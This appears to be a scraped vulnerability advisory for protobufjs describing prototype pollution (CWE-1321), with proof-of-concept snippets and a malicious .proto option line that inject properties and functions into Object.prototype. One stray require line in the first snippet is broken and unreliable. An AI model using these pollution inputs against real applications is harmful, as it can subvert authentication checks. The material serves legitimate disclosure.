This repository was archived by the owner on Feb 13, 2026. It is now read-only.
This repository was archived by the owner on Feb 13, 2026. It is now read-only.
Improperly Controlled Modification of Object Prototype Pollution via protobufjs #3013
Description
Description
A user-controlled protobuf message can be used by an attacker to pollute the prototype of Object.prototype by adding and overwriting its data and functions. Exploitation can involve: (1) using the function parse to parse protobuf messages on the fly, (2) loading .proto files by using load/loadSync functions, or (3) providing untrusted input to the functions ReflectionObject.setParsedOption and util.setProperty.
Vulnerability Description
- Using the parse function
const protobuf = require("clutch-sh");
const protobuf = require("protobufjs");
protobuf.parse('option(a).constructor.prototype.verified = true;');
console.log({}.verified);
// returns true- Using the
setParsedOptionfunction of aReflectionObject
const protobuf = require("protobufjs");
function gadgetFunction(){
console.log("User is authenticated");
}
// This will fail, but also pollute the prototype of Object
try {
let obj = new protobuf.ReflectionObject("Test");
obj.setParsedOption("unimportant!", gadgetFunction, "constructor.prototype.testFn");
} catch (e) {}
// Now we can make use of the new function on the polluted prototype
const a = {};
a.testFn();
// Prints "User is authenticated" to the console. - Using the function
util.setProperty
const protobuf = require("protobufjs");
protobuf.util.setProperty({}, "constructor.prototype.verified", true);
console.log({}.verified);
// returns true- With the
proto.pocfile containing the following line:
option(foo).constructor.prototype.verified = true;
CWE-1321
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H